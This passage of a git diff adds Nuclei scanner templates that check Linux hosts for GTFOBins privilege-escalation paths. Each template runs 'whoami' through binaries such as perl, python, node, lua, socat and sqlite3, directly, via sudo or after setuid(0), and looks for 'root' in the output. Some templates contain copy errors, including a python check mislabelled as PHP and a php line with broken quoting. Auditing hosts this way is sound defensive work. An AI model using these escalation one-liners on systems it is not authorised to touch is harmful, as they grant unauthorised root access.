+code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + gawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo gawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml new file mode 100644 index 0000000000..eaf176057e --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-grc + +info: + name: grc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/grc/ + metadata: + verified: true + tags: code,linux,grc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + grc --pty whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo grc --pty whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml new file mode 100644 index 0000000000..c3d8dc886a --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ionice + +info: + name: ionice - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ionice/ + metadata: + verified: true + tags: code,linux,ionice,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ionice whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ionice whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml new file mode 100644 index 0000000000..07a88f8342 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-julia + +info: + name: Julia - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/julia/ + metadata: + verified: true + tags: code,linux,julia,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + julia -e 'run(`whoami`)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo julia -e 'run(`whoami`)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml new file mode 100644 index 0000000000..48240ca4da --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-lftp + +info: + name: lftp - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/lftp/ + metadata: + verified: true + tags: code,linux,lftp,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + lftp -c '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo lftp -c '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml new file mode 100644 index 0000000000..de12f8c961 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ltrace + +info: + name: ltrace - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ltrace/ + metadata: + verified: true + tags: code,linux,ltrace,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ltrace -b -L whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ltrace -b -L whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml new file mode 100644 index 0000000000..560b16f07a --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-lua + +info: + name: lua - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/lua/ + metadata: + verified: true + tags: code,linux,lua,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + lua -e 'os.execute("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo lua -e 'os.execute("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml new file mode 100644 index 0000000000..d830a2fa96 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-mawk + +info: + name: mawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/mawk/ + metadata: + verified: true + tags: code,linux,mawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + mawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo mawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml new file mode 100644 index 0000000000..38878f634f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-multitime + +info: + name: Multitime - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/multitime/ + metadata: + verified: true + tags: code,linux,multitime,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + multitime whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo multitime whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml new file mode 100644 index 0000000000..e01b2bda0f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-mysql + +info: + name: MySQL - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/mysql/ + metadata: + verified: true + tags: code,linux,mysql,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + mysql -e '\! whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo mysql -e '\! whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml new file mode 100644 index 0000000000..c8f76a4dae --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-nawk + +info: + name: nawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nawk/ + metadata: + verified: true + tags: code,linux,nawk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nawk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo nawk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml new file mode 100644 index 0000000000..770007cde1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-nice + +info: + name: Nice - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nice/ + metadata: + verified: true + tags: code,linux,nice,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nice whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo nice whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml new file mode 100644 index 0000000000..40c9dc4f9d --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-node.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-node + +info: + name: Node - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/node/ + metadata: + verified: true + tags: code,linux,node,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + #SUDO + - engine: + - sh + - bash + source: | + sudo node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + #Capabilities + - engine: + - sh + - bash + source: | + node -e 'process.setuid(0); require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml new file mode 100644 index 0000000000..9052644225 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-nsenter + +info: + name: Nsenter - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nsenter/ + metadata: + verified: true + tags: code,linux,nsenter,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nsenter whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo nsenter whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml new file mode 100644 index 0000000000..3e8069ab8c --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-perl + +info: + name: Perl - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/perl/ + metadata: + verified: true + tags: code,linux,perl,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + perl -e 'exec "whoami";' + + #SUDO + - engine: + - sh + - bash + source: | + sudo perl -e 'exec "whoami";' + + #Capabilities + - engine: + - sh + - bash + source: | + perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml new file mode 100644 index 0000000000..98caa29600 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-pexec + +info: + name: pexec - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/pexec/ + metadata: + verified: true + tags: code,linux,pexec,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + pexec whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo pexec whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml new file mode 100644 index 0000000000..4e0a6c6539 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-php + +info: + name: PHP - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/php/ + metadata: + verified: true + tags: code,linux,php,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + php -r 'system("whoami");' + + #SUDO + - engine: + - sh + - bash + source: | + sudo php -r 'system("whoami");' + + #Capabilities + - engine: + - sh + - bash + source: | + php -r "posix_setuid(0); system("whoami");" + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml new file mode 100644 index 0000000000..ac416e2499 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-posh + +info: + name: posh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/posh/ + metadata: + verified: true + tags: code,linux,posh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + posh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo posh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml new file mode 100644 index 0000000000..3dbea834d8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-python + +info: + name: PHP - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/python/ + metadata: + verified: true + tags: code,linux,php,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + python -c 'import os; os.system("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo python -c 'import os; os.system("whoami")' + + #Capabilities + - engine: + - sh + - bash + source: | + python -c 'import os; os.setuid(0); os.system("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml new file mode 100644 index 0000000000..feb5b3bf43 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rake + +info: + name: Rake - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rake/ + metadata: + verified: true + tags: code,linux,rake,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rake -p '`whoami 1>&0`' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rake -p '`whoami 1>&0`' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml new file mode 100644 index 0000000000..f4d8ce5ebc --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rc + +info: + name: RC - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rc/ + metadata: + verified: true + tags: code,linux,rc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rc -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rc -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml new file mode 100644 index 0000000000..af24cc0803 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rlwrap + +info: + name: rlwrap - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rlwrap/ + metadata: + verified: true + tags: code,linux,rlwrap,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rlwrap whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo rlwrap whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml new file mode 100644 index 0000000000..026bdc56c8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpm + +info: + name: rpm - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpm/ + metadata: + verified: true + tags: code,linux,rpm,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpm --pipe 'whoami 0<&1' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpm --pipe 'whoami 0<&1' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml new file mode 100644 index 0000000000..f7d4dc0cc1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpmdb + +info: + name: rpmdb - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpmdb/ + metadata: + verified: true + tags: code,linux,rpmdb,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpmdb --eval '%(whoami 1>&2)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpmdb --eval '%(whoami 1>&2)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml new file mode 100644 index 0000000000..37e53c761e --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpmverify + +info: + name: rpmverify - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpmverify/ + metadata: + verified: true + tags: code,linux,rpmverify,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpmverify --eval '%(whoami 1>&2)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpmverify --eval '%(whoami 1>&2)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml new file mode 100644 index 0000000000..a2b1e9a9b9 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-ruby + +info: + name: Ruby - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ruby/ + metadata: + verified: true + tags: code,linux,ruby,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ruby -e 'exec "whoami"' + + #SUDO + - engine: + - sh + - bash + source: | + sudo ruby -e 'exec "whoami"' + + #Capabilities + - engine: + - sh + - bash + source: | + ruby -e 'Process::Sys.setuid(0); exec "whoami"' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml new file mode 100644 index 0000000000..76a2e3d181 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-run-parts + +info: + name: run-parts - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/run-parts/ + metadata: + verified: true + tags: code,linux,run-parts,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + run-parts --new-session --regex 'whoami' /bin + + #SUDO + - engine: + - sh + - bash + source: | + sudo run-parts --new-session --regex 'whoami' /bin + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml new file mode 100644 index 0000000000..85806eea1f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sash + +info: + name: sash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sash/ + metadata: + verified: true + tags: code,linux,sash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo sash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml new file mode 100644 index 0000000000..c3fd764778 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-slsh + +info: + name: slsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/slsh/ + metadata: + verified: true + tags: code,linux,slsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + slsh -e 'system("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo slsh -e 'system("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml new file mode 100644 index 0000000000..9016697ffb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-socat + +info: + name: Socat - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/socat/ + metadata: + verified: true + tags: code,linux,socat,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + socat stdin exec:whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo socat stdin exec:whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml new file mode 100644 index 0000000000..fee1f47c81 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-softlimit + +info: + name: softlimit - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/softlimit/ + metadata: + verified: true + tags: code,linux,softlimit,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + softlimit whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo softlimit whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml new file mode 100644 index 0000000000..7736c9b0aa --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sqlite3 + +info: + name: sqlite3 - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sqlite3/ + metadata: + verified: true + tags: code,linux,sqlite3,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sqlite3 /dev/null '.shell whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo sqlite3 /dev/null '.shell whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml 